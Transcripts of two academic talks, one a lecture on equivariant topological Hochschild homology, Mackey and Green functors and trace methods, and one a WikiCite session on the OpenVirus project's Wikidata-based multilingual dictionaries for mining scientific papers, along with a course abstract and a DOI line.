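For reference, here are the Bökstedt spectral sequence and the degree-zero linearization statement, in the standard form just described (k a field of coefficients):
\[ E^2_{s,t}=\mathrm{HH}_{s,t}\big(H_*(R;k)\big)\;\Longrightarrow\;H_{s+t}\big(\mathrm{THH}(R);k\big), \qquad \pi_0\,\mathrm{THH}(HA)\;\cong\;\mathrm{HH}_0(A). \]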
I'd like to understand how my twisted THH relates to some algebraic analog. But if we look at this classical story, I took Hochschild homology of a ring, and it was related to THH of the Eilenberg-MacLane spectrum. And so that brings me to a question: the input for my twisted theory needs to be equivariant, so how do I get a C_n-ring spectrum as an Eilenberg-MacLane spectrum? Or, a different way of phrasing that question: what is the equivariant analog of a ring? Okay, so I need to get at those questions if I'm going to be able to understand this kind of equivariant analog. So we're going to take a little detour to talk about some basic objects in equivariant homotopy theory that we haven't actually heard much about yet this week, called Mackey functors. This is going to seem like a detour for a second, and it's going to bring us back to this question of what the equivariant analog of a ring is. Now, if you've never seen a Mackey functor before, the thing that you should have in your head about Mackey functors is that Mackey functors are like the abelian groups of equivariant stable homotopy theory. What do I mean by that? In ordinary homotopy theory we have a lot of invariants that give us abelian groups; in equivariant homotopy theory we have a lot of invariants that give us Mackey functors. So what is a Mackey functor? I'm going to let my group be finite. For G finite, a Mackey functor M is actually a pair of functors, call them M-lower-star and M-upper-star, from finite G-sets to abelian groups, one of them covariant and one of them contravariant. Okay, so I have these two functors, and they have to satisfy a few properties. One is that the functors have to agree on objects: M-lower-star of X has to agree with M-upper-star of X, and that shared value is called M-underbar of X. When you see these underbars, that's indicating that we're working with Mackey functors. Teena? Yes? I'm sorry to have interrupted you; there is a question: what goes wrong if you try to copy the definition of C_n-twisted THH for G-equivariant HZ-module spectra? I think the point of the question is that, in the ordinary case of topological Hochschild homology, you can define a relative version of THH for module spectra, and if you do THH relative to HZ in the classical case, you get back the algebraic theory of Hochschild homology. And the question here is why we can't do this twisted version for HZ-module spectra, and whether that would give me back what I want. I have to admit that I have not thought about the relative version of the twisted theory, so I don't have a good answer off the top of my head of what considerations you would need to take there. We haven't defined that object, and I haven't thought through how that definition would work. And another question, from Sean Tilson. Oh yeah, so Sean says you get some Shukla-type phenomena because the tensor product is derived.
Well, I haven't gotten there yet, but I'm going to talk about this equivariant theory of Hochschild homology, and it can be generalized to a version of Shukla homology as well. It's not defined in the way that was just mentioned, as a twisted thing over HZ-module spectra, and I have not thought about whether that's equivalent. Okay, so, right, I was saying what a Mackey functor is: it's a pair of functors, they have to agree on values, they take disjoint unions to direct sums, and they have to satisfy some axioms that I'm not going to write down today. If you haven't seen Mackey functors before, one nice diagrammatic thing to keep in mind is the following. If you have nested subgroups of your group G, say K sitting inside H sitting inside G, we have a projection map from G/K to G/H. So what happens with the Mackey functor? G/K and G/H are finite G-sets, so I get a value of the Mackey functor at G/H and a value at G/K, and I have a covariant functor and a contravariant functor relating them, so I get maps in both directions. The covariant functor we usually call the transfer from K to H, and the contravariant functor is often referred to as the restriction from H to K. It turns out that any finite G-set is a disjoint union of these orbits, these things of the form G/K, so characterizing what happens on these orbits really tells you what happens with the whole Mackey functor. Now, we've actually seen a Mackey functor already this week, even though we didn't put it in that terminology, which is the following: if you have X a G-spectrum, you get a G-Mackey functor, the homotopy Mackey functor of X. I want to specify what this homotopy Mackey functor does on an orbit G/H: it's supposed to give me an abelian group, and it gives the n-th homotopy group of the H-fixed points of my spectrum X. So on Tuesday, all that time we were studying fixed points of THH, we were in particular studying a Mackey functor. And when I say Mackey functors are like the abelian groups of equivariant homotopy theory, this is kind of what I have in mind: in ordinary homotopy theory my homotopy groups spit out abelian groups, and in equivariant homotopy theory the natural way to think about the homotopy of an equivariant spectrum is as a Mackey functor. So Mackey functor constructions are very closely tied to equivariant spectra. Let me note that if you have a G-Mackey functor, let's call it M, it has an Eilenberg-MacLane spectrum attached to it, which is a G-spectrum, and we write it as HM. In what sense is it Eilenberg-MacLane? Well, it's a G-spectrum, so I can take its homotopy Mackey functor, and what do I get out? In degree zero I get my Mackey functor back, and in all other degrees I get zero. So that's the sense in which it is Eilenberg-MacLane. Okay, so to a Mackey functor I can associate an Eilenberg-MacLane equivariant spectrum. We're going to need a notion of norms for these Mackey functors. Mike Hill and Mike Hopkins give a definition of what it means to take the norm of a Mackey functor: suppose H is a subgroup of my finite group G, and M is an H-Mackey functor.
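Before giving their definition, let me record in symbols the two facts used repeatedly below, both exactly as described above:
\[ \underline{\pi}_n(X)(G/H)=\pi_n\big(X^{H}\big), \qquad \underline{\pi}_k(HM)\cong\begin{cases}M,&k=0,\\ 0,&k\neq 0.\end{cases} \]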
Here is the Hill-Hopkins definition of the norm from H to G of the Mackey functor M. I have my Mackey functor, and I just said I can take the Eilenberg-MacLane spectrum associated to it, which is an H-spectrum. I have a norm in equivariant spectra, the Hill-Hopkins-Ravenel norm, so I can take the norm from H to G in spectra. Now I have a G-spectrum, but I wanted a G-Mackey functor, so to get back to Mackey functors I take Mackey functor pi_0 of that. The plus and minus of this definition of Mackey functor norms is the following. On the upside, it's easy to state and it really highlights the close relationship between Mackey functors and the equivariant theory of G-spectra, and if you want to prove theorems about the Mackey functor norm, this is often the definition you use. The minus of this definition is that if you want to actually compute the norm of a specific Mackey functor, this is very difficult to get a handle on. There are much more algebraic constructions of the norm for Mackey functors, due for instance to Kristen Mazur and to Rolf Hoyer, and they give a more hands-on approach to understanding this without going through equivariant stable homotopy theory. Okay, but the Hill-Hopkins definition is clean and can be useful for us. Another thing we need to note is that there is a symmetric monoidal product on this category of G-Mackey functors, given by what is called the box product. What is the box product of two G-Mackey functors? Well, one way of saying what it is, is that it's closely related to the smash product in equivariant spectra: you take my Eilenberg-MacLane spectrum of M and my Eilenberg-MacLane spectrum of N, smash them together to get a G-spectrum, and then take Mackey functor pi_0 to get a G-Mackey functor. There is a question: are the contravariant maps on the homotopy Mackey functor some sort of averaging over H mod K? So, I've been maybe a little neglectful up here: when I talked about this homotopy Mackey functor I just told you what it does on these orbits, and a Mackey functor is of course more than just the information of its values on finite G-sets; there are also the covariant and contravariant maps, the transfer and restriction maps. In the context of the homotopy Mackey functor, how do we think about those? One of them, the restriction map, is a nice easy-to-describe map given by inclusion of fixed points, so it is, confusingly, the map that we called F earlier in the week, not the map we called R; there's a clash of notation there. The other map is what's called the equivariant transfer, and the way to think about that map is that it comes from the Wirthmüller isomorphism in equivariant homotopy theory, together with some duality for these orbits; it's sort of a unique feature of being in the equivariant setting. Good question. Okay, so I've given you a definition of the box product, and this is similar to what I was saying about the norms: it's a definition that goes through equivariant stable homotopy theory.
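In symbols, the Hill-Hopkins Mackey norm and the box product as characterized through Eilenberg-MacLane spectra (the second formula states the relationship described above as an identification):
\[ N_H^G M\;:=\;\underline{\pi}_0\big(N_H^G\,HM\big), \qquad M\,\square\,N\;\cong\;\underline{\pi}_0\big(HM\wedge HN\big). \]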
Mackey functors are really algebraic objects; you're supposed to think of them as living in algebra, and lots of people in math use Mackey functors without being interested in stable homotopy theory. Mackey functors are useful for studying representation rings and other things. So you can define the box product totally algebraically; I'm giving you this characterization to show the relationship with G-spectra. Okay, so now I have this symmetric monoidal product on G-Mackey functors, and finally I'm ready to address the question of what an equivariant ring is. Well, an equivariant abelian group is a Mackey functor, and an equivariant ring is called a Green functor: a Green functor is a monoid in this category. And then note that for a Green functor R-underbar for C_n, its Eilenberg-MacLane spectrum is a C_n-ring spectrum. One of our questions was how to get an equivariant ring spectrum as an Eilenberg-MacLane spectrum, and the answer is: using Green functors. So what do I really want for that equivariant analog? It turns out that what I need is a theory of Hochschild homology for Green functors. And that theory of Hochschild homology for Green functors is defined using that same kind of twisted cyclic bar construction: we can do the same construction we did for spectra, now in the context of these Green functors, where in place of a ring spectrum I use my Green functor and in place of smash products I use box products, and the same twisted construction makes sense here. So what is the definition of Hochschild homology for Green functors? This comes out of work of Andrew Blumberg, myself, Mike Hill, and Tyler Lawson. The definition is the following: if you have H inside G inside S^1 and R-underbar an H-Green functor, the G-twisted Hochschild homology of R-underbar is the homology of the twisted cyclic bar construction on the Mackey functor norm from H to G of R-underbar. Oh yes, there is a question: is the box product symmetric? Yes, this is the symmetric monoidal structure in this category. To really talk about the multiplicative structure you want to be working with Tambara functors and not just with Mackey functors, and I don't want to go there right now; but yes, it is a symmetric monoidal structure, and if you are working with Tambara functors you get even more than that. So, I claim that this is the algebraic analog of my twisted THH, and the theorem is that we have a linearization map relating these theories: if I take the twisted THH of the Eilenberg-MacLane spectrum of R-underbar and pass to its homotopy Mackey functor, it maps to this twisted version of Hochschild homology for Green functors, and this is furthermore an isomorphism if k is equal to zero, which is what we wanted to see from the perspective of what happens in the classical case. One of our goals was to define an equivariant version of the Bökstedt spectral sequence, so another piece of evidence that this is the right algebraic analog would be a Bökstedt spectral sequence computing twisted THH with E_2 term in this Hochschild homology for Green functors. And indeed there is such a spectral sequence.
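Schematically, and with notation that is my own shorthand rather than the official one, the definition and the linearization statement read:
\[ \underline{\mathrm{HH}}^{G}_{H,*}(\underline{R})\;:=\;H_*\Big(B^{cy,G}_\bullet\big(N_H^G\,\underline{R}\big)\Big),\qquad H\subseteq G\subset S^1, \]
\[ \underline{\pi}_0\big(\text{twisted }\mathrm{THH}\text{ of the Eilenberg-MacLane spectrum of }\underline{R}\big)\;\cong\;\underline{\mathrm{HH}}^{G}_{H,0}(\underline{R}). \]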
This comes out of work of Katharine Adamyk, myself, Kathryn Hess, Inbar Klang and Hana Jia Kong, in which we construct such an equivariant Bökstedt spectral sequence. So we construct an equivariant Bökstedt spectral sequence for twisted THH, and it has E2 term in the Hochschild homology for Green functors. And it turns out that this Hochschild homology for Green functors really is, you know, the right algebraic analog that you're looking for. And it turns out that this spectral sequence can be used computationally. So part of the work of these authors I just mentioned is that we use this equivariant Bökstedt spectral sequence to compute the equivariant homology of the C2-twisted THH of MU_R, which we learned about earlier, with coefficients in what's called the constant Mackey functor F2. So this is an equivariant version of homology. If you're not familiar with that, I'm not going to dive into what exactly that means, but that's the natural notion of homology to consider in this equivariant setting. Okay, I'm almost out of time, but I want to close by addressing one question. I want to sort of bring this full circle. In the beginning of the week, we were talking about K-theory of rings, and now I've been talking about these equivariant analogs of THH. And so a question you might have is, well, can these equivariant theories tell us anything about the classical story? Can we learn about the classical story this way? And so I want to connect it back. So what does this tell us about the classical story? Here's one thing to say about it. Well, why would there be any connection? Here's one reason we might expect to have a connection to the classical story. The classical story was about rings. And now I've moved into this world of Green functors and Mackey functors, but a ring is actually a Green functor: a classical ring is a Green functor for the trivial group. Okay, so what does that mean? Well, it means that we get some new trace maps out of this story. So I had a trace map from algebraic K-theory to topological Hochschild homology, which we lifted through the fixed points. And if you use this new linearization map relating the equivariant THH to this twisted version of Hochschild homology, what you find is that you get a trace map from the algebraic K-theory of a classical ring to the C_{p^n}-twisted Hochschild homology of that ring, evaluated at the orbit C_{p^n} mod C_{p^n}. So I'm not going to unpack how you get that trace map exactly, but it follows directly from that linearization map that we had a moment ago. So what is this thing? Well, the way to think about this is that it is the algebraic analog of fixed points of THH. So this is a purely algebraic object that is going to serve as an analog of fixed points of THH. Now, in order for those fixed points of THH to be useful in order to study TC, I needed to not only know about the fixed points themselves, but I needed to know about those two operators on them, that f and that r. The f map is already part of the Mackey functor. It's built into this story automatically, because it is the restriction map in those Mackey functors. So I don't have to worry about that, but the r map is something outside the Mackey functor structure. The r map, which was confusingly called the restriction in this context, was the map that depended on the cyclotomic structure.
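The trace map just described can be written as follows (a sketch, with the superscript and evaluation conventions as stated verbally in the talk, not necessarily matching the paper's notation): for a classical ring A, regarded as a Green functor for the trivial group,

    \mathrm{tr}\colon\; K(A) \longrightarrow \underline{\mathrm{HH}}^{\,C_{p^n}}(A)\bigl(C_{p^n}/C_{p^n}\bigr),

the C_{p^n}-twisted Hochschild homology of A evaluated at the orbit C_{p^n}/C_{p^n}, obtained from the classical trace K(A) \to \mathrm{THH}(A), its lift through fixed points, and the linearization map above.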
And once you have that r map, in the classical theory there is an object called topological restriction homology, which is what you get when you take the limit across the r maps of THH. We didn't frame it this way on Monday, but this TR, this topological restriction homology, sits between the fixed points of THH and topological cyclic homology. It's one of the things you compute on the way. So what I'd like to know is, well, can I do this in the algebraic setting? Do I have an analog of that restriction map, the map that came from the cyclotomic structure? And what we show in Blumberg, myself, Hill, and Lawson is that you do get such an analog of this restriction map. So we define geometric fixed points for Mackey functors, and we show that you get a type of cyclotomic structure on the Hochschild homology of Green functors. And in particular — Can you get this trace map via the universal property of algebraic K-theory, as in Blumberg-Gepner-Tabuada? I'd have to think about whether there's a way to characterize it in terms of the universal properties. That's not how we define it. We define it directly through the trace from K-theory — through the topological Dennis trace, basically — and the fact that the topological Dennis trace lifts through fixed points. But I have not thought about whether there is a universal characterization of it, so I'm not sure. Right. So the last thing I was saying is that we define what it means to take geometric fixed points for Mackey functors. We prove that there's a type of cyclotomic structure on Hochschild homology for Green functors. And what it gives you is an algebraic version of TR, which we call little tr. And what is this? Well, it's a limit, over these algebraic versions of the restriction map, of these C_{p^n}-twisted Hochschild homologies of the ring A, evaluated at this orbit. And as an example, you could compute, for instance, the algebraic TR of F_p. So we do this calculation, and what goes into that? Well, you need to understand the Mackey functor norms on F_p, the twisted cyclic bar construction on F_p, and then the cyclotomic structure for that. And it turns out what you see is that you get the p-adics in degree zero and zero everywhere else. And so in this case, this algebraic approximation is really a good approximation, because that agrees exactly with the topological restriction homology — the topological theory — and the p-completion of the algebraic K-theory of F_p. Okay, so in this case of F_p it captures, you know, basically all the information; that of course in general will not be true — it is some algebraic analog of this topological theory. Okay, I'm a little bit over time, so I'm going to stop there. It has been a pleasure to be with you this week, and I hope that I have given, especially the early career people, some idea of what trace methods and K-theory are about, and of some interesting developments that have been happening in this area. So I will stop there. Many thanks indeed. And let's thank Teena for a wonderful mini course. There is a question. Can you say roughly what the Bredon homology of THH of MU_R is? And does it split into pieces where some of these summands are familiar? Yeah, I should know how to split it into pieces. So I can tell you what the, you know — if I look it up, I can tell you what the answer is.
I still remember when I was a PhD student, many years ago now, the first time that I asked my advisor something that was in a paper that he wrote, and he said, oh, I don't know, I'll look it up. And that was for me a very liberating moment: even my advisor didn't remember everything he'd ever written down. So I don't feel bad about looking up this answer in my own paper. Right, so what is the answer for the C2-equivariant homology of the topological Hochschild homology of MU_R? So this is the C2-twisted Hochschild homology. In this case, we get a really nice answer. So — okay, there were a few things I didn't say. One of the things I didn't say is that with that equivariant Bökstedt spectral sequence, when you start working in these equivariant worlds, you end up having multiple gradings. You get Z-graded spectral sequences — you get Z-graded theories, graded by the integers like we're used to — and you also get theories graded by representation rings. And it turns out that the representation-ring-graded object is the more natural thing to consider in many cases. So what I'm writing down is the RO(C2)-graded equivariant homology. And for those of you who are new to equivariant stable homotopy theory, let me introduce you to a really special convention, which is that a five-pointed star is usually an equivariant grading — that means a representation grading — and an asterisk is an integer grading. Something useful to know. So that grading is now graded by representations. And what this is, is the equivariant homotopy groups of the Eilenberg-MacLane spectrum of F2, with polynomial generators b1, b2, and so on adjoined, and then it's box over HF2-star with the exterior algebra over HF2-star on z1, z2, etc. So I don't know if that was helpful or not. The degree of b_i is i times the regular representation, and the degree of z_i is one plus that. So that's what the answer is for the equivariant homology of that. And I don't know if you find that helpful or not. But yeah. Okay, so — the question is, one way of seeing topological Hochschild homology is as a relative smash product over A smash A-op, and is there an analog of this for this C_n-twisted THH? Yes, you can think of the C_n-twisted THH in terms of these relative smash products. And maybe the thing to say is that if I'm interested in, let's say, the H-twisted THH of R, and I'm interested in that as a G-spectrum — I think I did that in the opposite direction I meant to — if I want to restrict that to a G-spectrum, then you can write this as a relative smash product of the norm from H to G of R over the enveloping thing, that norm smash its opposite. But then what you have over here is a twisted version of the norm. So yes, there is a way to characterize it in terms of these relative smash products, but you pick up a little bit of a twist, so it's a bit different from the classical one. The next question I see is: is there a trace map from equivariant K-theory to this twisted THH? Yeah, that's a great question. That's a very natural question to ask: at the end I was saying, well, you can get trace maps out of a ring, but can we naturally get trace maps from some kind of equivariant version of K-theory to this twisted THH? The answer to that is yes.
I have work in progress with some of the people I mentioned — Katharine Adamyk, Kathryn Hess, Inbar Klang and Hana Jia Kong — where we're looking at what the right kind of K-theory is in order to get that sort of trace map, and maybe I won't say too much about that since it's work in progress. I don't want to make any bold claims yet, and I don't yet have connections to known notions of equivariant K-theory. A lot of people have considered different notions of equivariant algebraic K-theory, and I don't yet have a connection between the C_n-relative THH and those different known theories of equivariant K-theory. Is there a reason we don't have to use a derived limit for TR? I mean, this limit that I'm talking about here — these things that I am taking the limit of are all just abelian groups, and so here it is just an ordinary limit of abelian groups that ends up being the right thing to take. I don't know, maybe that's not a very satisfying answer, but that's what's happening in this case. Let me read your question. If G is a finite group acting on a commutative ring R, can we cook up a G-Tambara functor? Perhaps with the fixed points. G is a finite group acting on a commutative ring R... I'm not sure exactly what you're asking. So you want, like, a group acting on a classical ring — can we cook up a G-Tambara functor? I don't know off the top of my head. Yeah, I'm not sure what the answer to your question is. I apologize. What kind of Morita invariance property does this twisted THH have? That's another great question. So, right, these Hochschild theories in general — Hochschild homology, topological Hochschild homology, any sort of Hochschild theory — one thing that you might want to ask for is that they be Morita invariant, right? That's something that's really common amongst Hochschild theories and something that's sort of important to those theories. In some cases you can prove that directly, but there's recent work coming out of work of Kate Ponto, and of Ponto and Shulman, and now there's a larger group of collaborators — Campbell and Ponto, etc. — in which we talk about Hochschild homology and topological Hochschild homology as bicategorical shadows. And with that shadow approach — whatever that means, I don't want to go into what that means, but we heard a little bit about it in the first lecture this morning, if you were there, that kind of idea of a shadow — if you know that THH is a shadow, then Morita invariance comes for free, because it turns out Morita equivalence is a natural notion of equivalence in bicategories. So the question is about twisted THH, and this is a great question. In that same work in progress that I mentioned, of Adamyk and myself and Hess and Klang and Kong, we have shown that you can view this twisted topological Hochschild homology as sort of an equivariant shadow. So in particular, you get Morita invariance also in this case for free. And so, yeah, it aligns nicely with what you'd expect from one of these Hochschild theories, and you do get Morita invariance. So that's a nice property to know that you have for twisted THH. Any other questions or comments for Teena? If not, then, merci beaucoup for everything, for a wonderful mini-course. Thanks. Thank you Teena again.
|
Algebraic K-theory is an invariant of rings and ring spectra which illustrates a fascinating interplay between algebra and topology. Defined using topological tools, this invariant has important applications to algebraic geometry, number theory, and geometric topology. One fruitful approach to studying algebraic K-theory is via trace maps, relating algebraic K-theory to (topological) Hochschild homology, and (topological) cyclic homology. In this mini-course I will introduce algebraic K-theory and related Hochschild invariants, and discuss recent advances in this area. Topics will include cyclotomic spectra, computations of the algebraic K-theory of rings, and equivariant analogues of Hochschild invariants.
|
10.5446/51069 (DOI)
|
Hi everyone, good to see you all here. I'm Erica Zelini and along with Celia Costa, I'll be the host for this session. We both are members of the Wikimovimento Brasil User Group. We are located in Sao Paulo, Brazil, and we are honored to have in this session such location and language diversity to show to you. We have here at least three very different time zones, which was a bit challenging to coordinate, but totally worth it. So the initial idea was to gather on a single session, to call people from the global south working on modeling projects on Wikidata and with bibliography and libraries. So very ambitious. Then Thomas Schafer recommended us to talk to Peter Murray-Rust, and his team from OpenVirus based in India, and we are glad we did it. So soon we realized that that would be better to split into sessions. So now you'll get to know the diverse team from OpenVirus plus some interfaces with Latin America and Indonesia. And later today Celia and I will be back with another session on Structuring Wikidata Projects. So this one will be held 75% of the time in Portuguese and 25% of the time in Spanish. I think it will work out well. So please, even if those aren't your first languages, you're welcome to join us and get to know these projects. I don't want to make this introduction too long, but say thank you is never enough. So I just want to say thank you to the speakers in advance. I'm sure we'll learn a lot from them. And I also want to thank to the Wikiside committee that approved under the eSchoolership modality that Celia and I ran those two sessions. And a special thanks to Leon Wyatt that have been supporting us since the beginning. So the idea was to bring Global Solvices to the conference under these teams. And I believe that Wikiside is all about language diversity as well after all. So now some reminders. You can ask questions or make comments directly through YouTube or the other pet that is available on the program. You can also comment via Twitter. Celia will be dealing with this. And we'll let the speakers do their talk and open for questions and for discussions at the end. So without further ado, I'll bring the speakers to start this session. So please welcome Peter Murray-Rust, Chewita Hedge, Frutri Virajan, Viraj Dengani, Lakshmi Devitriya, Vaishali Arora, Dr. Andrin Hamadani, Ayush Ghar, Ariana Berisel-Garcia, Frutri Virajan, Dezapta, even anyone. And please correct me if I mispronounce any other beautiful names and let's have fun with it, OK? So please, I'll bring the first one that is Peter. And I'll share your screen. Excellent. So this is a wonderful meeting and greetings to everybody. This is not my show. This is me helping a number of people I know to present their message to the world. I'm at the University of Cambridge, but I also run a nonprofit called ContentMine. And here you can see that six years ago, we visited Brazil for open science meeting. Maybe you can recognize some of the people. And I want to say that Brazil and other Latin American countries are doing a wonderful job in fighting for open. And you will see later what Ariana has to show from Mexico. But this is your show. And I hope that we can support you in this endeavor. I was very involved in developing content mining. And six years ago, my colleague Jenny Maloy visited Gita Yadav in Delhi. And this was a meeting that we held over the internet six years ago. Gita and Jenny are plant sciences. And so this concentrated on the chemistry of plants. 
And Gita and I have been running a project for six years on that. Now, why does it matter? About seven years ago, there was a major epidemic of Ebola virus in Liberia. And this was predicted — sorry, I'll go back — this was predicted in the scientific literature, but it was hidden behind a paywall. The message was very clear: here's the paper, it still costs $31, it's 40 years old, but it says very clearly that Ebola and Liberia are linked. And so simple text mining of the sort that we have developed in ContentMine is capable of liberating this. So the simple message here is that we are searching papers in the scholarly literature for the things we are interested in: diseases, viruses, countries, and so on. And we are very grateful to Wikimedia, who supported us with a grant in 2017 to develop the ContentMine version of this, which we called WikiFactMine. And in this, we developed dictionaries. So the concept is dictionaries of terms that we can search the literature with. And we have been developing it since then. And we are going to show you this today. We took this idea to India a year and a half ago. Here is Gita again, and me, in Delhi. And these are some wonderful collaborators in this workshop. And we built dictionaries for rice, millets, and maize, because these are the crops we were particularly concerned about for food security. This is a food security program. I've also got the great privilege to know Anasuya Sengupta, who for many years worked with Wikimedia and was the grant-making officer. She now has a Shuttleworth Fellowship, and she has developed a project called Whose Knowledge?, which is to amplify marginalized voices in the world and to decolonize the internet. And that is a theme which this session is going to show to you: marginalized voices and decolonization, and particularly the global south. So what you're going to see in this program is some of our collaborators. You're going to have a presentation from the OpenVirus team. You're going to see Arianna showing the Redalyc server in Mexico. And we've invited Dasapta to talk about an Indonesian archive, so another language from the global south. And we also asked Daniel Mietchen to tie this together, using Scholia. I don't know whether Daniel can join us, but we will finish with a discussion on how we bring all of this together under the Wikimedia umbrella. And so our goal is to unite the Wikimedia technology to honor inclusion, equity, and diversity. And we have an etherpad open. And if you have any questions and ideas, please add them to that. But I will now hand over to Shweata Hegde, who is doing a brilliant job of coordinating this meeting. So over to Shweata. Yes. OK. Thank you so much, Peter, for that. I'm Shweata. I'm an undergraduate from India, as well as science communicator for the team OpenVirus. Thank you, Erica and Celia, for organizing such a wonderful session. It's a pleasure to be here at WikiCite. And it's also so nice that we are demonstrating how important Wikimedia's Wikidata has been to our project, as well as for science as a whole, on its eighth birthday. So the rest of the talk is going to have the following outline. First, I will go over how we built our team. Next, I will briefly talk about the architecture and the overview of the project. The team members are then going to discuss more about the project, the science that we do, and the technicalities of it. And finally, we will have a discussion, which will lead into Wikimedia. So let's get started.
There is a huge influx in the number of papers, scientific publications, that are coming out — and even more so as COVID-19 hit. Unless the data in them is structured and the papers are annotated and aggregated, there is little the world can do about it. Therefore, there is no simple way for citizens or even researchers to get proper insights from the open literature. So this initial realization led Dr. Peter Murray-Rust and other global volunteers to start endeavors like this. They started with Open Climate Knowledge earlier this year, but when the pandemic hit, they decided to use the same technology that they used for Open Climate Knowledge to tackle viral epidemics. And that's how OpenVirus started. It started with two interns, along with Dr. Peter Murray-Rust and Dr. Gita Yadav. Gita Yadav is a lecturer at the University of Cambridge and also a group leader at NIPGR, as Peter already mentioned. So our team began five months ago. And gradually, as time passed, we were joined by more and more interns, talented individuals who have contributed immensely to the project. In the middle, we were also joined by Karya interns from Rajasthan, India, which was really great. And recently, we participated in the Cambridge Bioinformatics Hackathon, wherein we were joined by many other global volunteers to the team. And we always welcome more people to join us, especially Wikimedians. So as you can already tell, our team is very diverse. We've got bioscientists, we now have computer scientists as well, we've also got a high school student, and so on. Most of us have access to laptops, but some of us only have phones. But still, together, we are able to do science. Our team, even though we work virtually, is built upon collaboration, inclusivity, diversity, and equity. One amazing part about our project is that we do all of our work in the open. All of the work that we do is available on our GitHub page, including our progress reports too, which we update in real time. We've also been able to livestream one of our lab meetings online, which is available at this link. And we've also given several outreach talks at various platforms, which are available at this link. These links are available on the etherpad as well. So as the team grew, we divided ourselves into eight mini-projects, each of them working on a specific facet of viral epidemics. So we've got eight mini-projects, that is: viral epidemics in countries, viral epidemics and diseases, drugs and viral epidemics, active funders in viral epidemics research, the role of non-pharmaceutical interventions in viral epidemics, viruses in viral epidemics, the role of zoonosis in viral epidemics, and testing and tracing in viral epidemics. Some of our team members are going to discuss some of these mini-projects in detail. So how exactly do we extract knowledge from literature? In other words, what is the architecture of our project? Well, we've got three sorts of puzzle pieces to the project. First, we've got the minicorpora. Second, we've got the dictionaries. And third, we've got ami. Let's look at them one by one. First, we've got the minicorpora. A minicorpus is a collection of scientific articles on a specific query. And we get them through many open repositories, like the Europe PMC repository, which has millions of open access papers. And we use a tool called getpapers, which helps us download hundreds of papers in minutes. Recently, we were able to collaborate with Arianna from Redalyc, and we'll hear more from her later.
So because of that collaboration, we now have a minicorpus in Spanish, which we were able to annotate with the help of the tools that we've built. And we would also like to extend this to many preprint servers in different languages as well. All of the minicorpora are downloaded on our local machines, and searches are run on our local machines. OK, now the minicorpora are done. Next, we've got dictionaries. And this is where Wikidata comes in. We create our dictionaries with the help of SPARQL queries, and we then run them through amidict, a tool that we've developed — more about this later; we have our team members discussing this in detail — to get a functional dictionary. So this is how a typical dictionary looks. This is a dictionary of country facets. So we've got terms, that is, names of countries. We've got the Wikidata ID, Wikipedia URL, and so on. We've got eight dictionaries corresponding to eight of our mini-projects. And dictionaries are there to extract multidisciplinary knowledge about viral epidemics. Most of these dictionaries were created directly from Wikidata SPARQL queries. One amazing thing about these dictionaries is that they're multilingual. And that multilinguality means that we can empower the global south as well as other underrepresented parts of the world. The one good thing about using Wikidata is that it is very, very easy to introduce multilinguality to the system. OK, so now we've got minicorpora, and then we've got the dictionaries. What do we do with them? Well, that's where ami comes in. With a variety of dictionaries, we can then annotate and classify the papers in the minicorpora with the help of ami to get dashboards and co-occurrences as results. In other words, ami takes in the minicorpus and annotates it with the terms that we have given in the dictionary, to give us dashboards which link back to Wikidata and Wikipedia. And it also gives us co-occurrences, frequencies, and much more. ami search can also give us the main subject of a specific paper with the help of dictionaries. So this is sort of a brief overview of the project. And we can use further downstream tools like Jupyter Notebooks and R to make further inferences from the results that we get from ami search. And this is what has been done by the team, especially in the last few months. So let's quickly talk about our inspiration. Well, our inspiration comes from Ranganathan, who is a father of global library science. We believe that repositories are for everyone everywhere, and that knowledge should be free and accessible to all, irrespective of what they do or where they come from. One thing that I realized after joining OpenVirus is that the world is more connected than ever before, and we can break barriers of languages and countries to come together and do science for the greater good. With that, I would quickly like to thank the team, and Dr. Peter Murray-Rust and Dr. Gitanjali Yadav, who have been amazing mentors. And it's always such a delight to work with this amazing team. With that, I would like to hand it over to the team to discuss more of the science that we do. And they will have demonstrations, which I hope are going to be fun. Over to the team. Thank you. Thank you, Shweata. So now we'll have here Rajan and Dheeraj. Hello, can you hear me? Yes. Please go ahead and bring up the screens. Just a second here. Ambreen, can you show his slides? Thank you. Hello, my name is Dheeraj Dingani. I'm from Rajasthan, India. I was with this team in July.
It's very difficult to access the internet where we are — I don't know when it's coming or not. It's a great thing to be with this team. Next slide. I didn't have a computer. I did all my work on my smartphone — SPARQL and everything else. I learned a lot from OpenVirus: how to work as a team, and how much knowledge there is out there about computers and scientific knowledge, which we need to increase. Next. I was introduced to an ocean, which means that however much knowledge I have, I have nothing. I learned in this internship how to use SPARQL and all that. I have used this first query, and the results are in the next slide. These are the results: the IDs, Wikipedia links, descriptions — all of these are from the first multilingual SPARQL query. These are the results. There are two languages, English and Spanish. That's all. Thanks. Thank you, Dheeraj. We now have Rajan, who is going to demonstrate how we use SPARQL queries to create dictionaries. Over to you, Rajan. Thank you. I'm Pratap Rajan. I'm going to tell you how we build a multilingual dictionary, using the example of a drug dictionary. As Shweata said, this is going to be multilingual. We use the Wikidata SPARQL Query Service for building a dictionary, and it's multilingual. We have languages such as Portuguese, Indian languages such as Tamil, Sanskrit and Hindi, and some other languages like German and Spanish too. This is how we use the Wikidata SPARQL query service to build dictionaries. Every Wikidata item has a unique item number — that is, every item has its unique code, which is represented with the letter Q. Here's an example that I have shown you of two drugs. Instead of bringing all the drugs together on one command line, we found that medication is an item which drugs are linked to with the 'instance of' property. By using this property, we could fetch the data from Wikipedia through the Wikidata Query Service. This is what a typical multilingual query looks like. Here is the property — as I said earlier, with the Q item for medication — that selects the items that have been linked as drugs, that is, medications which are used as medicines for humans. This P274 property tells us the chemical formula, because every drug has its own chemical formula, and its own pictures. The other property, P117, gives us the chemical structures. These are the label clauses, which determine the particular languages to extract the terms in. We are saying that we need the label, the alternative label and the description in each particular language, as mentioned here. As this goes multilingual, we always have to provide a link, or give a reference for where the word comes from. Every drug and every molecule in this has been linked directly to Wikipedia in the query. Each language has its own Wikipedia link, so it redirects directly to its own page as well. I'll be demonstrating how it works a bit later. This is what the SPARQL output of a multilingual dictionary looks like. You can see here that, it being multilingual, you can find Wikipedia links for terms in English. You can also find these drugs with their many names — they have their own IUPAC names and some other local names. We have been using alternative labels to fetch all the related terms for those drugs. You can also find multiple languages, and there are Wikipedia links here which go directly to their pages.
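To make the shape of such a query concrete, here is a minimal sketch of a multilingual drug query of the kind described above. The item and property IDs (medication Q12140, chemical formula P274, chemical structure P117) are the ones referred to in the talk, but the language list and the LIMIT are illustrative, and the team's actual dictionary queries may differ:

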